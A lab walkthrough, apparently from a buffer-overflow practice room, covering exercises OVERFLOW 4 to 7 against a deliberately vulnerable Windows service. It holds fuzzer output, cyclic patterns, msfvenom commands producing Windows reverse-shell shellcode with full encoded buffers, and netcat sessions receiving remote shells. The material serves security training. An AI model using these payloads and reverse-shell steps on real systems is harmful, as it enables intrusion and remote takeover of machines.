kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.219.184] 49294
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

OVERFLOW 4

Kick off the fuzzer.py against the target IP.

kali@kali:~/Documents/bufferoverflow$ python fuzzer.py 
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing with 800 bytes
Fuzzing with 900 bytes
Fuzzing with 1000 bytes
Fuzzing with 1100 bytes
Fuzzing with 1200 bytes
Fuzzing with 1300 bytes
Fuzzing with 1400 bytes
Fuzzing with 1500 bytes
Fuzzing with 1600 bytes
Fuzzing with 1700 bytes
Fuzzing with 1800 bytes
Fuzzing with 1900 bytes
Fuzzing with 2000 bytes
Fuzzing with 2100 bytes
Could not connect to 10.10.199.166:1337

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow/overflow4$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow4$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788
 EXITFUNC=thread -b "\x00\xa9\xcd\xd4" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xda\xdd\xba\xc6\x45\x34\x11\xd9\x74\x24\xf4\x5e\x31"
buf += b"\xc9\xb1\x52\x31\x56\x17\x83\xee\xfc\x03\x90\x56\xd6"
buf += b"\xe4\xe0\xb1\x94\x07\x18\x42\xf9\x8e\xfd\x73\x39\xf4"
buf += b"\x76\x23\x89\x7e\xda\xc8\x62\xd2\xce\x5b\x06\xfb\xe1"
buf += b"\xec\xad\xdd\xcc\xed\x9e\x1e\x4f\x6e\xdd\x72\xaf\x4f"
buf += b"\x2e\x87\xae\x88\x53\x6a\xe2\x41\x1f\xd9\x12\xe5\x55"
buf += b"\xe2\x99\xb5\x78\x62\x7e\x0d\x7a\x43\xd1\x05\x25\x43"
buf += b"\xd0\xca\x5d\xca\xca\x0f\x5b\x84\x61\xfb\x17\x17\xa3"
buf += b"\x35\xd7\xb4\x8a\xf9\x2a\xc4\xcb\x3e\xd5\xb3\x25\x3d"
buf += b"\x68\xc4\xf2\x3f\xb6\x41\xe0\x98\x3d\xf1\xcc\x19\x91"
buf += b"\x64\x87\x16\x5e\xe2\xcf\x3a\x61\x27\x64\x46\xea\xc6"
buf += b"\xaa\xce\xa8\xec\x6e\x8a\x6b\x8c\x37\x76\xdd\xb1\x27"
buf += b"\xd9\x82\x17\x2c\xf4\xd7\x25\x6f\x91\x14\x04\x8f\x61"
buf += b"\x33\x1f\xfc\x53\x9c\x8b\x6a\xd8\x55\x12\x6d\x1f\x4c"
buf += b"\xe2\xe1\xde\x6f\x13\x28\x25\x3b\x43\x42\x8c\x44\x08"
buf += b"\x92\x31\x91\x9f\xc2\x9d\x4a\x60\xb2\x5d\x3b\x08\xd8"
buf += b"\x51\x64\x28\xe3\xbb\x0d\xc3\x1e\x2c\x38\x12\x2e\x04"
buf += b"\x54\x18\x2e\x4a\xc9\x95\xc8\x18\x01\xf0\x43\xb5\xb8"
buf += b"\x59\x1f\x24\x44\x74\x5a\x66\xce\x7b\x9b\x29\x27\xf1"
buf += b"\x8f\xde\xc7\x4c\xed\x49\xd7\x7a\x99\x16\x4a\xe1\x59"
buf += b"\x50\x77\xbe\x0e\x35\x49\xb7\xda\xab\xf0\x61\xf8\x31"
buf += b"\x64\x49\xb8\xed\x55\x54\x41\x63\xe1\x72\x51\xbd\xea"
buf += b"\x3e\x05\x11\xbd\xe8\xf3\xd7\x17\x5b\xad\x81\xc4\x35"
buf += b"\x39\x57\x27\x86\x3f\x58\x62\x70\xdf\xe9\xdb\xc5\xe0"
buf += b"\xc6\x8b\xc1\x99\x3a\x2c\x2d\x70\xff\x4c\xcc\x50\x0a"
buf += b"\xe5\x49\x31\xb7\x68\x6a\xec\xf4\x94\xe9\x04\x85\x62"
buf += b"\xf1\x6d\x80\x2f\xb5\x9e\xf8\x20\x50\xa0\xaf\x41\x71"

Next use mona to find all addresses that do not include the bad characters.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.253.107] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

OVERFLOW 5

Kick off the fuzzer.py against the target IP.

kali@kali:~/Documents/bufferoverflow$ python fuzzer.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Could not connect to 10.10.253.107:1337

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 800
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba

Back in Immunity search for the pattern using mona.

Restart the .exe in Immunity Debugger with Ctrl+F12 and F9 to run. Execute the exploit.py. If the offset is correct we should see “42424242” <- the B’s at the EIP.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow5$ msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=7788 EXITFUNC=thread -b "\x00\x16\x2f\xf4\xfd" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with Failed to locate a valid permutation.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with Encoding failed due to a bad character (index=23, char=0xf4)
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=43, char=0x16)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with Encoding failed due to a bad character (index=8, char=0xf4)
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive succeeded with size 353 (iteration=0)
x86/jmp_call_additive chosen with final size 353
Payload size: 353 bytes
Final size of py file: 1731 bytes
buf =  b""
buf += b"\xfc\xbb\x45\x8e\x37\x8d\xeb\x0c\x5e\x56\x31\x1e\xad"
buf += b"\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xb9"
buf += b"\x66\xb5\x8d\x41\x77\xda\x04\xa4\x46\xda\x73\xad\xf9"
buf += b"\xea\xf0\xe3\xf5\x81\x55\x17\x8d\xe4\x71\x18\x26\x42"
buf += b"\xa4\x17\xb7\xff\x94\x36\x3b\x02\xc9\x98\x02\xcd\x1c"
buf += b"\xd9\x43\x30\xec\x8b\x1c\x3e\x43\x3b\x28\x0a\x58\xb0"
buf += b"\x62\x9a\xd8\x25\x32\x9d\xc9\xf8\x48\xc4\xc9\xfb\x9d"
buf += b"\x7c\x40\xe3\xc2\xb9\x1a\x98\x31\x35\x9d\x48\x08\xb6"
buf += b"\x32\xb5\xa4\x45\x4a\xf2\x03\xb6\x39\x0a\x70\x4b\x3a"
buf += b"\xc9\x0a\x97\xcf\xc9\xad\x5c\x77\x35\x4f\xb0\xee\xbe"
buf += b"\x43\x7d\x64\x98\x47\x80\xa9\x93\x7c\x09\x4c\x73\xf5"
buf += b"\x49\x6b\x57\x5d\x09\x12\xce\x3b\xfc\x2b\x10\xe4\xa1"
buf += b"\x89\x5b\x09\xb5\xa3\x06\x46\x7a\x8e\xb8\x96\x14\x99"
buf += b"\xcb\xa4\xbb\x31\x43\x85\x34\x9c\x94\xea\x6e\x58\x0a"
buf += b"\x15\x91\x99\x03\xd2\xc5\xc9\x3b\xf3\x65\x82\xbb\xfc"
buf += b"\xb3\x05\xeb\x52\x6c\xe6\x5b\x13\xdc\x8e\xb1\x9c\x03"
buf += b"\xae\xba\x76\x2c\x45\x41\x11\x59\x9c\x47\x49\x35\xa2"
buf += b"\x57\x97\xaa\x2b\xb1\xcd\x22\x7a\x6a\x7a\xda\x27\xe0"
buf += b"\x1b\x23\xf2\x8d\x1c\xaf\xf1\x72\xd2\x58\x7f\x60\x83"
buf += b"\xa8\xca\xda\x02\xb6\xe0\x72\xc8\x25\x6f\x82\x87\x55"
buf += b"\x38\xd5\xc0\xa8\x31\xb3\xfc\x93\xeb\xa1\xfc\x42\xd3"
buf += b"\x61\xdb\xb6\xda\x68\xae\x83\xf8\x7a\x76\x0b\x45\x2e"
buf += b"\x26\x5a\x13\x98\x80\x34\xd5\x72\x5b\xea\xbf\x12\x1a"
buf += b"\xc0\x7f\x64\x23\x0d\xf6\x88\x92\xf8\x4f\xb7\x1b\x6d"
buf += b"\x58\xc0\x41\x0d\xa7\x1b\xc2\x2d\x4a\x89\x3f\xc6\xd3"
buf += b"\x58\x82\x8b\xe3\xb7\xc1\xb5\x67\x3d\xba\x41\x77\x34"
buf += b"\xbf\x0e\x3f\xa5\xcd\x1f\xaa\xc9\x62\x1f\xff\xc9\x84"
buf += b"\xdf\x00"

Next use mona to find all addresses that do not include the bad characters.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.253.107] 49276
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

OVERFLOW 6

Kick off the fuzzer.py against the target IP.

kali@kali:~/Documents/bufferoverflow$ python fuzzer.py 
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing with 800 bytes
Fuzzing with 900 bytes
Fuzzing with 1000 bytes
Fuzzing with 1100 bytes
Could not connect to 10.10.152.239:1337

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9

Back in Immunity search for the pattern using mona.

Now we can start building the bad character list.

After removing the bad characters from the bytearray and the payload, compare and ensure shellcode appears unmodified.

Now generate the reverse shell payload using msfvenom.

kali@kali:~/Documents/bufferoverflow/overflow6$  msfvenom -p windows/shell_reverse_tcp LHOST=10.6.14.168 LPORT=778
8 EXITFUNC=thread -b "\x00\x08\x2c\xad" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xb8\xc6\xbd\x42\x5c\xda\xde\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\x05\xb9\xa0"
buf += b"\xa9\x75\x2a\xa6\x52\x85\xab\xc7\xdb\x60\x9a\xc7\xb8"
buf += b"\xe1\x8d\xf7\xcb\xa7\x21\x73\x99\x53\xb1\xf1\x36\x54"
buf += b"\x72\xbf\x60\x5b\x83\xec\x51\xfa\x07\xef\x85\xdc\x36"
buf += b"\x20\xd8\x1d\x7e\x5d\x11\x4f\xd7\x29\x84\x7f\x5c\x67"
buf += b"\x15\xf4\x2e\x69\x1d\xe9\xe7\x88\x0c\xbc\x7c\xd3\x8e"
buf += b"\x3f\x50\x6f\x87\x27\xb5\x4a\x51\xdc\x0d\x20\x60\x34"
buf += b"\x5c\xc9\xcf\x79\x50\x38\x11\xbe\x57\xa3\x64\xb6\xab"
buf += b"\x5e\x7f\x0d\xd1\x84\x0a\x95\x71\x4e\xac\x71\x83\x83"
buf += b"\x2b\xf2\x8f\x68\x3f\x5c\x8c\x6f\xec\xd7\xa8\xe4\x13"
buf += b"\x37\x39\xbe\x37\x93\x61\x64\x59\x82\xcf\xcb\x66\xd4"
buf += b"\xaf\xb4\xc2\x9f\x42\xa0\x7e\xc2\x0a\x05\xb3\xfc\xca"
buf += b"\x01\xc4\x8f\xf8\x8e\x7e\x07\xb1\x47\x59\xd0\xb6\x7d"
buf += b"\x1d\x4e\x49\x7e\x5e\x47\x8e\x2a\x0e\xff\x27\x53\xc5"
buf += b"\xff\xc8\x86\x4a\xaf\x66\x79\x2b\x1f\xc7\x29\xc3\x75"
buf += b"\xc8\x16\xf3\x76\x02\x3f\x9e\x8d\xc5\x4a\x59\x83\xbd"
buf += b"\x23\x67\x9b\xa3\xdf\xee\x7d\xb1\x0f\xa7\xd6\x2e\xa9"
buf += b"\xe2\xac\xcf\x36\x39\xc9\xd0\xbd\xce\x2e\x9e\x35\xba"
buf += b"\x3c\x77\xb6\xf1\x1e\xde\xc9\x2f\x36\xbc\x58\xb4\xc6"
buf += b"\xcb\x40\x63\x91\x9c\xb7\x7a\x77\x31\xe1\xd4\x65\xc8"
buf += b"\x77\x1e\x2d\x17\x44\xa1\xac\xda\xf0\x85\xbe\x22\xf8"
buf += b"\x81\xea\xfa\xaf\x5f\x44\xbd\x19\x2e\x3e\x17\xf5\xf8"
buf += b"\xd6\xee\x35\x3b\xa0\xee\x13\xcd\x4c\x5e\xca\x88\x73"
buf += b"\x6f\x9a\x1c\x0c\x8d\x3a\xe2\xc7\x15\x5a\x01\xcd\x63"
buf += b"\xf3\x9c\x84\xc9\x9e\x1e\x73\x0d\xa7\x9c\x71\xee\x5c"
buf += b"\xbc\xf0\xeb\x19\x7a\xe9\x81\x32\xef\x0d\x35\x32\x3a"

Next use mona to find all addresses that do not include the bad characters.

kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
kali@kali:~$ nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.6.14.168] from (UNKNOWN) [10.10.1.46] 49276
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\oscp>whoami
whoami
oscp-bof-prep\admin

C:\Users\admin\Desktop\vulnerable-apps\oscp>

OVERFLOW 7

Kick off the fuzzer.py against the target IP.

Now generate a pattern based on the length of bytes to crash the server.

kali@kali:~/Documents/bufferoverflow/overflow7$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1700
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4B